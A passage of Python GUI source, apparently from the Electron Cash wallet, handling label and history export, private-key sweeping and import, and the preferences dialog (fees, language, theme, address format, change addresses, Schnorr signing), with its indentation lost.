try:
fileName = self.getSaveFileName(_("Select file to save your labels"), 'electron-cash_labels.json', "*.json")
if fileName:
with open(fileName, 'w+', encoding='utf-8') as f: # always ensure UTF-8. See issue #1453.
json.dump(labels, f, indent=4, sort_keys=True)
self.show_message(_("Your labels were exported to") + " '%s'" % str(fileName))
except (IOError, os.error) as reason:
self.show_critical(_("Electron Cash was unable to export your labels.") + "\n" + str(reason))
def export_history_dialog(self):
d = WindowModalDialog(self.top_level_window(), _('Export History'))
d.setMinimumSize(400, 200)
vbox = QVBoxLayout(d)
defaultname = os.path.expanduser('~/electron-cash-history.csv')
select_msg = _('Select file to export your wallet transactions to')
box, filename_e, csv_button = filename_field(self.config, defaultname, select_msg)
vbox.addWidget(box)
include_addresses_chk = QCheckBox(_("Include addresses"))
include_addresses_chk.setChecked(True)
include_addresses_chk.setToolTip(_("Include input and output addresses in history export"))
vbox.addWidget(include_addresses_chk)
fee_dl_chk = QCheckBox(_("Fetch accurate fees from network (slower)"))
fee_dl_chk.setChecked(self.is_fetch_input_data())
fee_dl_chk.setEnabled(bool(self.wallet.network))
fee_dl_chk.setToolTip(_("If this is checked, accurate fee and input value data will be retrieved from the network"))
vbox.addWidget(fee_dl_chk)
fee_time_w = QWidget()
fee_time_w.setToolTip(_("The amount of overall time in seconds to allow for downloading fee data before giving up"))
hbox = QHBoxLayout(fee_time_w)
hbox.setContentsMargins(20, 0, 0, 0)
hbox.addWidget(QLabel(_("Timeout:")), 0, Qt.AlignRight)
fee_time_sb = QSpinBox()
fee_time_sb.setMinimum(10)
fee_time_sb.setMaximum(9999)
fee_time_sb.setSuffix(" " + _("seconds"))
fee_time_sb.setValue(30)
fee_dl_chk.clicked.connect(fee_time_w.setEnabled)
fee_time_w.setEnabled(fee_dl_chk.isChecked())
hbox.addWidget(fee_time_sb, 0, Qt.AlignLeft)
hbox.addStretch(1)
vbox.addWidget(fee_time_w)
vbox.addStretch(1)
hbox = Buttons(CancelButton(d), OkButton(d, _('Export')))
vbox.addLayout(hbox)
run_hook('export_history_dialog', self, hbox)
self.update()
res = d.exec_()
d.setParent(None) # for python GC
if not res:
return
filename = filename_e.text()
if not filename:
return
success = False
try:
# minimum 10s time for calc. fees, etc
timeout = max(fee_time_sb.value() if fee_dl_chk.isChecked() else 10.0, 10.0)
success = self.do_export_history(filename, csv_button.isChecked(),
download_inputs=fee_dl_chk.isChecked(),
timeout=timeout,
include_addresses=include_addresses_chk.isChecked())
except Exception as reason:
export_error_label = _("Electron Cash was unable to produce a transaction export.")
self.show_critical(export_error_label + "\n" + str(reason), title=_("Unable to export history"))
else:
if success:
self.show_message(_("Your wallet history has been successfully exported."))
def plot_history_dialog(self):
if plot_history is None:
return
wallet = self.wallet
history = wallet.get_history()
if len(history) > 0:
plt = plot_history(self.wallet, history)
plt.show()
def is_fetch_input_data(self):
''' default on if network.auto_connect is True, otherwise use config value '''
return bool(self.wallet and self.wallet.network and self.config.get('fetch_input_data', self.wallet.network.auto_connect))
def set_fetch_input_data(self, b):
self.config.set_key('fetch_input_data', bool(b))
def do_export_history(self, fileName, is_csv, *, download_inputs=False, timeout=30.0, include_addresses=True):
wallet = self.wallet
if not wallet:
return
dlg = None # this will be set at the bottom of this function
def task():
def update_prog(x):
if dlg: dlg.update_progress(int(x*100))
return wallet.export_history(fx=self.fx,
show_addresses=include_addresses,
decimal_point=self.decimal_point,
fee_calc_timeout=timeout,
download_inputs=download_inputs,
progress_callback=update_prog)
success = False
def on_success(history):
nonlocal success
ccy = (self.fx and self.fx.get_currency()) or ''
has_fiat_columns = history and self.fx and self.fx.show_history() and 'fiat_value' in history[0] and 'fiat_balance' in history[0] and 'fiat_fee' in history[0]
lines = []
for item in history:
if is_csv:
cols = [item['txid'], item.get('label', ''), item['confirmations'], item['value'], item['fee'], item['date']]
if has_fiat_columns:
cols += [item['fiat_value'], item['fiat_balance'], item['fiat_fee']]
if include_addresses:
inaddrs_filtered = (x for x in (item.get('input_addresses') or [])
if Address.is_valid(x))
outaddrs_filtered = (x for x in (item.get('output_addresses') or [])
if Address.is_valid(x))
cols.append( ','.join(inaddrs_filtered) )
cols.append( ','.join(outaddrs_filtered) )
lines.append(cols)
else:
if has_fiat_columns and ccy:
item['fiat_currency'] = ccy # add the currency to each entry in the json. this wastes space but json is bloated anyway so this won't hurt too much, we hope
elif not has_fiat_columns:
# No need to include these fields as they will always be 'No Data'
item.pop('fiat_value', None)
item.pop('fiat_balance', None)
item.pop('fiat_fee', None)
lines.append(item)
with open(fileName, "w+", encoding="utf-8") as f: # ensure encoding to utf-8. Avoid Windows cp1252. See #1453.
if is_csv:
transaction = csv.writer(f, lineterminator='\n')
cols = ["transaction_hash","label", "confirmations", "value", "fee", "timestamp"]
if has_fiat_columns:
cols += [f"fiat_value_{ccy}", f"fiat_balance_{ccy}", f"fiat_fee_{ccy}"] # in CSV mode, we use column names eg fiat_value_USD, etc
if include_addresses:
cols += ["input_addresses", "output_addresses"]
transaction.writerow(cols)
for line in lines:
transaction.writerow(line)
else:
f.write(json.dumps(lines, indent=4))
success = True
# kick off the waiting dialog to do all of the above
dlg = WaitingDialog(self.top_level_window(),
_("Exporting history, please wait ..."),
task, on_success, self.on_error, disable_escape_key=True,
auto_exec=False, auto_show=False, progress_bar=True, progress_min=0, progress_max=100)
dlg.exec_()
# this will block heere in the WaitingDialog event loop... and set success to True if success
return success
def sweep_key_dialog(self):
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
if not addresses:
self.show_warning(_('Wallet has no address to sweep to'))
return
d = WindowModalDialog(self.top_level_window(), title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
bip38_warn_label = QLabel(_("<b>BIP38 support is disabled because a requisite library is not installed.</b> Please install 'cryptodomex' or omit BIP38 private keys (private keys starting in 6P...). Decrypt keys to WIF format (starting with 5, K, or L) in order to sweep."))
bip38_warn_label.setWordWrap(True)
bip38_warn_label.setHidden(True)
vbox.addWidget(bip38_warn_label)
extra = ""
if bitcoin.is_bip38_available():
extra += " " + _('or BIP38 keys')
vbox.addWidget(QLabel(_("Enter private keys") + extra + " :"))
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
h, addr_combo = address_combo(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
sweep_button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), sweep_button))
def get_address_text():
return addr_combo.currentText()
def get_priv_keys():
return keystore.get_private_keys(keys_e.toPlainText(), allow_bip38=True)
def has_bip38_keys_but_no_bip38():
if bitcoin.is_bip38_available():
return False
keys = [k for k in keys_e.toPlainText().split() if k]
return any(bitcoin.is_bip38_key(k) for k in keys)
def enable_sweep():
bad_bip38 = has_bip38_keys_but_no_bip38()
sweepok = bool(get_address_text() and not bad_bip38 and get_priv_keys())
sweep_button.setEnabled(sweepok)
bip38_warn_label.setHidden(not bad_bip38)
keys_e.textChanged.connect(enable_sweep)
enable_sweep()
res = d.exec_()
d.setParent(None)
if not res:
return
try:
self.do_clear()
keys = get_priv_keys()
bip38s = {}
for i, k in enumerate(keys):
if bitcoin.is_bip38_key(k):
bip38s[k] = i
if bip38s:
# For all the BIP38s detected, prompt for password
from .bip38_importer import Bip38Importer
d2 = Bip38Importer(bip38s.keys(), parent=self.top_level_window())
d2.exec_()
d2.setParent(None)
if d2.decoded_keys:
for k,tup in d2.decoded_keys.items():
wif, adr = tup
# rewrite the keys they specified with the decrypted WIF in the keys list for sweep_preparations to work below...
i = bip38s[k]
keys[i] = wif
else:
self.show_message(_("User cancelled"))
return
coins, keypairs = sweep_preparations(keys, self.network)
self.tx_external_keypairs = keypairs
self.payto_e.setText(get_address_text())
self.spend_coins(coins)
self.spend_max()
except BaseException as e:
self.show_message(str(e))
return
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, msg, func):
text = text_dialog(self.top_level_window(), title, msg + ' :', _('Import'),
allow_multi=True)
if not text:
return
bad, bad_info = [], []
good = []
for key in str(text).split():
try:
addr = func(key)
good.append(addr)
except BaseException as e:
bad.append(key)
bad_info.append("{}: {}".format(key, str(e)))
continue
if good:
self.show_message(_("The following addresses were added") + ':\n' + '\n'.join(good))
if bad:
self.show_warning(_("The following could not be imported") + ':\n' + '\n'.join(bad), detail_text='\n\n'.join(bad_info))
self.address_list.update()
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")
def import_addr(addr):
if self.wallet.import_address(Address.from_string(addr)):
return addr
return ''
self._do_import(title, msg, import_addr)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title, msg = _('Import private keys'), _("Enter private keys")
if bitcoin.is_bip38_available():
msg += " " + _('or BIP38 keys')
def func(key):
if bitcoin.is_bip38_available() and bitcoin.is_bip38_key(key):
from .bip38_importer import Bip38Importer
d = Bip38Importer([key], parent=self.top_level_window(),
message = _('A BIP38 key was specified, please enter a password to decrypt it'),
show_count = False)
d.exec_()
d.setParent(None) # python GC quicker if this happens
if d.decoded_keys:
wif, adr = d.decoded_keys[key]
return self.wallet.import_private_key(wif, password)
else:
raise util.UserCancelled()
else:
return self.wallet.import_private_key(key, password)
self._do_import(title, msg, func)
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.refresh_headers()
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def cashaddr_icon(self):
if self.gui_object.is_cashaddr():
return QIcon(":icons/tab_converter.svg")
else:
return QIcon(":icons/tab_converter_bw.svg")
def cashaddr_status_tip(self):
if self.gui_object.is_cashaddr():
return _('Address Format') + ' - ' + _('CashAddr')
else:
return _('Address Format') + ' - ' + _('Legacy')
def update_cashaddr_icon(self):
self.addr_converter_button.setIcon(self.cashaddr_icon())
self.addr_converter_button.setStatusTip(self.cashaddr_status_tip())
def toggle_cashaddr_status_bar(self):
self.gui_object.toggle_cashaddr()
self.statusBar().showMessage(self.cashaddr_status_tip(), 2000)
def toggle_cashaddr_settings(self, state):
self.gui_object.toggle_cashaddr(state == Qt.Checked)
def toggle_cashaddr(self, on):
self.print_error('*** WARNING ElectrumWindow.toggle_cashaddr: This function is deprecated. Please do not call it!')
self.gui_object.toggle_cashaddr(on)
def settings_dialog(self):
class SettingsModalDialog(WindowModalDialog):
shown_signal = pyqtSignal()
def showEvent(self, e):
super().showEvent(e)
self.shown_signal.emit()
self.need_restart = False
dialog_finished = False
d = SettingsModalDialog(self.top_level_window(), _('Preferences'))
d.setObjectName('WindowModalDialog - Preferences')
destroyed_print_error(d)
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
misc_widgets = []
global_tx_widgets, per_wallet_tx_widgets = [], []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electroncash.i18n import languages, get_system_language_match, match_language
language_names = []
language_keys = []
for (lang_code, lang_def) in languages.items():
language_keys.append(lang_code)
lang_name = []
lang_name.append(lang_def.name)
if lang_code == '':
# System entry in languages list (==''), gets system setting
sys_lang = get_system_language_match()
if sys_lang:
lang_name.append(f' [{languages[sys_lang].name}]')
language_names.append(''.join(lang_name))
lang_combo.addItems(language_names)
conf_lang = self.config.get("language", '')
if conf_lang:
# The below code allows us to rename languages in saved config and
# have them still line up with languages in our languages dict.
# For example we used to save English as en_UK but now it's en_US
# and it will still match
conf_lang = match_language(conf_lang)
try: index = language_keys.index(conf_lang)
except ValueError: index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]:
w.setEnabled(False)
def on_lang(x):
lang_request = language_keys[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be '
'displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.update_tabs()
self.update_status()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
def on_customfee(x):
amt = customfee_e.get_amount()
m = int(amt * 1000.0) if amt is not None else None
self.config.set_key('customfee', m)
self.fee_slider.update()
self.fee_slider_mogrifier()
fee_gb = QGroupBox(_('Fees'))
fee_lo = QGridLayout(fee_gb)
customfee_e = BTCSatsByteEdit()
customfee_e.setAmount(self.config.custom_fee_rate() / 1000.0 if self.config.has_custom_fee_rate() else None)
customfee_e.textChanged.connect(on_customfee)
customfee_label = HelpLabel(_('Custom fee rate:'), _('Custom Fee Rate in Satoshis per byte'))
fee_lo.addWidget(customfee_label, 0, 0, 1, 1, Qt.AlignRight)
fee_lo.addWidget(customfee_e, 0, 1, 1, 1, Qt.AlignLeft)
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_e.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_lo.addWidget(feebox_cb, 1, 0, 1, 2, Qt.AlignJustify)
# Fees box up top
misc_widgets.append((fee_gb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link/']) + '\n\n'\
+ _('For more information, see http://openalias.org')
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
# this ensures that even if exception occurs or we exit function early,
# the signal is disconnected
disconnect_alias_received_signal = Weak.finalize(d, self.alias_received_signal.disconnect, set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_gb = QGroupBox(_("Identity"))
id_form = QFormLayout(id_gb)
id_form.addRow(alias_label, alias_e)
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_form.addRow(SSL_id_label, SSL_id_e)
# Identity box in middle of this tab
misc_widgets.append((id_gb, None)) # commit id_form/id_gb to master layout via this data structure
from . import exception_window as ew
cr_gb = QGroupBox(_("Crash Reporter"))
cr_grid = QGridLayout(cr_gb)
cr_chk = QCheckBox()
cr_chk.setChecked(ew.is_enabled(self.config))
cr_chk.clicked.connect(lambda b: ew.set_enabled(self.config, b))
cr_help = HelpLabel(_("Crash reporter enabled"),
_("The crash reporter is the error window which pops-up when Electron Cash encounters an internal error.\n\n"
"It is recommended that you leave this option enabled, so that developers can be notified of any internal bugs. "
"When a crash is encountered you are asked if you would like to send a report.\n\n"
"Private information is never revealed in crash reports to developers."))
# The below dance ensures the checkbox is horizontally centered in the widget
cr_grid.addWidget(QWidget(), 0, 0, 1, 1) # dummy spacer
cr_grid.addWidget(cr_chk, 0, 1, 1, 1, Qt.AlignRight)
cr_grid.addWidget(cr_help, 0, 2, 1, 1, Qt.AlignLeft)
cr_grid.addWidget(QWidget(), 0, 3, 1, 1) # dummy spacer
cr_grid.setColumnStretch(0, 1)
cr_grid.setColumnStretch(3, 1)
# Crash reporter box at bottom of this tab
misc_widgets.append((cr_gb, None)) # commit crash reporter gb to layout
units = util.base_unit_labels # ( 'BCH', 'mBCH', 'bits' )
msg = _('Base unit of your wallet.')\
+ '\n1 BCH = 1,000 mBCH = 1,000,000 bits.\n' \
+ _(' These settings affects the fields in the Send tab')+' '
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
dp = util.base_units.get(unit_result)
if dp is not None:
self.decimal_point = dp
else:
raise Exception('Unknown base unit')
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_tabs()
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = web.BE_sorted_list()
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online block explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(web.BE_from_config(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
qr_combo = QComboBox()
qr_label = HelpLabel(_('Video device'), '')
qr_did_scan = False
def set_no_camera(e=''):
# Older Qt or missing libs -- disable GUI control and inform user why
qr_combo.setEnabled(False)
qr_combo.clear()
qr_combo.addItem(_("Default"), "default")
qr_combo.setToolTip(_("Unable to probe for cameras on this system. QtMultimedia is likely missing."))
qr_label.setText(_('Video device') + ' ' + _('(disabled)') + ':')
qr_label.help_text = qr_combo.toolTip() + "\n\n" + str(e)
qr_label.setToolTip(qr_combo.toolTip())
def scan_cameras():
nonlocal qr_did_scan
if qr_did_scan or dialog_finished: # dialog_finished guard needed because QueuedConnection
# already scanned or dialog finished quickly
return
qr_did_scan = True
system_cameras = []
try:
from PyQt5.QtMultimedia import QCameraInfo
except ImportError as e:
set_no_camera(e)
return
system_cameras = QCameraInfo.availableCameras()
qr_combo.clear()
qr_combo.addItem(_("Default"), "default")
qr_label.setText(_('Video device') + ':')
qr_label.help_text = _("For scanning QR codes.")
qr_combo.setToolTip(qr_label.help_text)
qr_label.setToolTip(qr_label.help_text)
for cam in system_cameras:
qr_combo.addItem(cam.description(), cam.deviceName())
video_device = self.config.get("video_device")
video_device_index = 0
if video_device:
video_device_index = max(0, qr_combo.findData(video_device)) # if not found, default to 0 (the default item)
qr_combo.setCurrentIndex(video_device_index)
qr_combo.setEnabled(True)
def on_video_device(x):
if qr_combo.isEnabled():
self.config.set_key("video_device", qr_combo.itemData(x), True)
set_no_camera() # pre-populate combo box with default so it has a sizeHint
d.shown_signal.connect(scan_cameras, Qt.QueuedConnection) # do the camera scan once dialog is shown, using QueuedConnection so it's called from top level event loop and not from the showEvent handler
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Default'), 'default') # We can't name this "light" in the UI as sometimes the default is actually dark-looking eg on Mojave or on some Linux desktops.
colortheme_combo.addItem(_('Dark'), 'dark')
theme_name = self.config.get('qt_gui_color_theme', 'default')
dark_theme_available = self.gui_object.is_dark_theme_available()
if theme_name == 'dark' and not dark_theme_available:
theme_name = 'default'
index = colortheme_combo.findData(theme_name)
if index < 0: index = 0
colortheme_combo.setCurrentIndex(index)
if sys.platform in ('darwin',) and not dark_theme_available:
msg = _("Color theme support is provided by macOS if using Mojave or above."
" Use the System Preferences to switch color themes.")
err_msg = msg
else:
msg = ( _("Dark theme support requires the package 'QDarkStyle' (typically installed via the 'pip3' command on Unix & macOS).")
if not dark_theme_available
else '' )
err_msg = _("Dark theme is not available. Please install QDarkStyle to access this feature.")
lbltxt = _('Color theme') + ':'
colortheme_label = HelpLabel(lbltxt, msg) if msg else QLabel(lbltxt)
def on_colortheme(x):
item_data = colortheme_combo.itemData(x)
if not dark_theme_available and item_data == 'dark':
self.show_error(err_msg)
colortheme_combo.setCurrentIndex(0)
return
self.config.set_key('qt_gui_color_theme', item_data, True)
if theme_name != item_data:
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
if sys.platform not in ('darwin',):
# Enable/Disable HighDPI -- this option makes no sense for macOS
# and thus does not appear on that platform
hidpi_chk = QCheckBox(_('Automatic high-DPI scaling'))
if sys.platform in ('linux',):
hidpi_chk.setToolTip(_("Enable/disable this option if you experience graphical glitches (such as overly large status bar icons)"))
else: # windows
hidpi_chk.setToolTip(_("Enable/disable this option if you experience graphical glitches (such as dialog box text being cut off"))
hidpi_chk.setChecked(bool(self.config.get('qt_enable_highdpi', True)))
if self.config.get('qt_disable_highdpi'):
hidpi_chk.setToolTip(_('Automatic high DPI scaling was disabled from the command-line'))
hidpi_chk.setChecked(False)
hidpi_chk.setDisabled(True)
def on_hi_dpi_toggle():
self.config.set_key('qt_enable_highdpi', hidpi_chk.isChecked())
self.need_restart = True
hidpi_chk.stateChanged.connect(on_hi_dpi_toggle)
gui_widgets.append((hidpi_chk, None))
if sys.platform in ('win32', 'cygwin'):
# Enable/Disable the use of the FreeType library on Qt
# (Windows only)
freetype_chk = QCheckBox(_('Use FreeType for font rendering'))
freetype_chk.setChecked(self.gui_object.windows_qt_use_freetype)
freetype_chk.setEnabled(self.config.is_modifiable('windows_qt_use_freetype'))
freetype_chk.setToolTip(_("Enable/disable this option if you experience font rendering glitches (such as blurred text or monochrome emoji characters)"))
def on_freetype_chk():
self.gui_object.windows_qt_use_freetype = freetype_chk.isChecked() # property has a method backing it
self.need_restart = True
freetype_chk.stateChanged.connect(on_freetype_chk)
gui_widgets.append((freetype_chk, None))
elif sys.platform in ('linux',):
# Enable/Disable the use of the fonts.xml FontConfig override
# (Linux only)
fontconfig_chk = QCheckBox(_('Use custom fontconfig for emojis'))
fontconfig_chk.setChecked(self.gui_object.linux_qt_use_custom_fontconfig)
fontconfig_chk.setEnabled(self.config.is_modifiable('linux_qt_use_custom_fontconfig'))
fontconfig_chk.setToolTip(_("Enable/disable this option if you experience font rendering glitches (such as blurred text or monochrome emoji characters)"))
def on_fontconfig_chk():
self.gui_object.linux_qt_use_custom_fontconfig = fontconfig_chk.isChecked() # property has a method backing it
self.need_restart = True
fontconfig_chk.stateChanged.connect(on_fontconfig_chk)
gui_widgets.append((fontconfig_chk, None))
# CashAddr control
gui_widgets.append((None, None)) # spacer
address_w = QGroupBox(_('Address Format'))
address_w.setToolTip(_('Select between Cash Address and Legacy formats for addresses'))
hbox = QHBoxLayout(address_w)
cashaddr_cbox = QComboBox()
cashaddr_cbox.addItem(QIcon(':icons/tab_converter.svg'), _("CashAddr"), Address.FMT_CASHADDR)
cashaddr_cbox.addItem(QIcon(':icons/tab_converter_bw.svg'), _("Legacy"), Address.FMT_LEGACY)
cashaddr_cbox.setCurrentIndex(0 if self.gui_object.is_cashaddr() else 1)
def cashaddr_cbox_handler(ignored_param):
fmt = int(cashaddr_cbox.currentData())
self.gui_object.toggle_cashaddr(fmt == Address.FMT_CASHADDR)
cashaddr_cbox.currentIndexChanged.connect(cashaddr_cbox_handler)
hbox.addWidget(cashaddr_cbox)
toggle_cashaddr_control = QCheckBox(_('Hide status button'))
toggle_cashaddr_control.setToolTip(_('If checked, the status bar button for toggling address formats will be hidden'))
toggle_cashaddr_control.setChecked(self.gui_object.is_cashaddr_status_button_hidden())
toggle_cashaddr_control.toggled.connect(self.gui_object.set_cashaddr_status_button_hidden)
hbox.addWidget(toggle_cashaddr_control)
gui_widgets.append((address_w, None))
gui_widgets.append((None, None)) # spacer
updatecheck_cb = QCheckBox(_("Automatically check for updates"))
updatecheck_cb.setChecked(self.gui_object.has_auto_update_check())
updatecheck_cb.setToolTip(_("Enable this option if you wish to be notified as soon as a new version of Electron Cash becomes available"))
def on_set_updatecheck(v):
self.gui_object.set_auto_update_check(v == Qt.Checked)
updatecheck_cb.stateChanged.connect(on_set_updatecheck)
gui_widgets.append((updatecheck_cb, None))
notify_tx_cb = QCheckBox(_('Notify when receiving funds'))
notify_tx_cb.setToolTip(_('If enabled, a system notification will be presented when you receive funds to this wallet.'))
notify_tx_cb.setChecked(bool(self.wallet.storage.get('gui_notify_tx', True)))
def on_notify_tx(b):
self.wallet.storage.put('gui_notify_tx', bool(b))
notify_tx_cb.stateChanged.connect(on_notify_tx)
per_wallet_tx_widgets.append((notify_tx_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
if self.force_use_single_change_addr:
usechange_cb.setChecked(True)
usechange_cb.setEnabled(False)
if isinstance(self.force_use_single_change_addr, str):
usechange_cb.setToolTip(self.force_use_single_change_addr)
else:
usechange_cb.setToolTip('')
else:
usechange_cb.setChecked(self.wallet.use_change)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
per_wallet_tx_widgets.append((usechange_cb, None))
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
if self.force_use_single_change_addr:
multiple_cb.setEnabled(False)
multiple_cb.setChecked(False)
if isinstance(self.force_use_single_change_addr, str):
multiple_cb.setToolTip(self.force_use_single_change_addr)
else:
multuple_cb.setToolTip('')
else:
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_cb.stateChanged.connect(on_multiple)
per_wallet_tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
global_tx_widgets.append((unconf_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
enable_opreturn = bool(self.config.get('enable_opreturn'))
opret_cb = QCheckBox(_('Enable OP_RETURN output'))
opret_cb.setToolTip(_('Enable posting messages with OP_RETURN.'))
opret_cb.setChecked(enable_opreturn)
opret_cb.stateChanged.connect(self.on_toggled_opreturn)
global_tx_widgets.append((opret_cb,None))
# Legacy BCT Segwit Send Protection™
legacy_p2sh_cb = QCheckBox(_('Allow legacy p2sh in the Send tab'))
prefix_char = '3' if not networks.net.TESTNET else '2'
legacy_p2sh_cb.setToolTip(_('If enabled, you will be allowed to use legacy \'{prefix_char}...\' style addresses in the Send tab.\nOtherwise you must use CashAddr for p2sh in the UI.').format(prefix_char=prefix_char))
legacy_p2sh_cb.setChecked(bool(self.config.get('allow_legacy_p2sh', False)))
def on_legacy_p2sh_cb(b):
self.config.set_key('allow_legacy_p2sh', bool(b))
legacy_p2sh_cb.stateChanged.connect(on_legacy_p2sh_cb)
global_tx_widgets.append((legacy_p2sh_cb, None))
# Schnorr
use_schnorr_cb = QCheckBox(_("Sign with Schnorr signatures"))
use_schnorr_cb.setChecked(self.wallet.is_schnorr_enabled())
use_schnorr_cb.stateChanged.connect(self.wallet.set_schnorr_enabled)
no_schnorr_reason = []
if self.wallet.is_schnorr_possible(no_schnorr_reason):
use_schnorr_cb.setEnabled(True)
use_schnorr_cb.setToolTip(_("Sign all transactions using Schnorr signatures."))
else:
# not possible (wallet type not supported); show reason in tooltip
use_schnorr_cb.setEnabled(False)
use_schnorr_cb.setToolTip(no_schnorr_reason[0])
per_wallet_tx_widgets.append((use_schnorr_cb, None))
# Fiat Tab (only build it if not on testnet)
#
# Note that at the present time self.fx is always defined, including for --offline mode;
# we will check if self.fx is not None here just in case that changes some day.
